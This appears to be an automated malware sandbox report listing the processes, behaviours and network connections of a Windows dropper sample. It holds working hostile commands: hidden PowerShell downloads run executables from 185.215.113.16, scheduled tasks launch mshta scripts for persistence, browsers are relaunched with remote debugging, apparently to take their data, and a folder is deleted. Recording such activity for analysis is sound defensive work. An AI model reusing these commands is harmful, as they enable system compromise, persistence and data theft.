| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2672 -ip 2672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff993bbcc40,0x7ff993bbcc4c,0x7ff993bbcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE
"C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1728 -s 1712
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\f71Q9b6DZ.hta"
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9988446f8,0x7ff998844708,0x7ff998844718
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit
C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe
"C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5956 -ip 5956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 808
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe
"C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe"
C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe
"C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af06cc40,0x7ff9af06cc4c,0x7ff9af06cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2100 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3828,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4584,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe
"C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | fua.4t.com | udp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | e6.o.lencr.org | udp |
| GB | 2.23.210.75:80 | e6.o.lencr.org | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | tcp |
| DE | 109.120.178.136:80 | 109.120.178.136 | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
